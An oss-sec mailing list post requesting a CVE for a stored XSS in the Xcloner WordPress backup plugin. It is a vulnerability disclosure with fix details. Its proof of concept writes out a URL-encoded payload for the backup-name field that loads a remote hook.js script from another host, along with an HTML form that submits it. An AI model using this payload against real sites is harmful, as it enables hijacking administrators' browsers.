oss-sec mailing list archives
CVE request : a stored XSS in Xcloner for wordpress
From: limingxing <limingxing () 360 cn>
Date: Wed, 27 Jul 2016 02:35:46 +0000
Hi I found a stored XSS in Xcloner for wordpress. The XSS filter can be bypass. Here is the plugin page https://wordpress.org/plugins/xcloner-backup-and-restore/ PoC In the "Corn setting" page(URL is "http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"), set the "Backup name" (corn_bname) like "1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" <html> <form action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config" method="post"> <input type="hidden" name="cron_bname" value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" /> <input type="submit" name="submit"> </form> </html> Fix way Update to version 3.1.5 Change https://plugins.trac.wordpress.org/changeset/1456784 Could you assign a CVE ID for it? Chen Ruiqi Codesafe Team
Current thread:
- CVE request : a stored XSS in Xcloner for wordpress limingxing (Jul 27)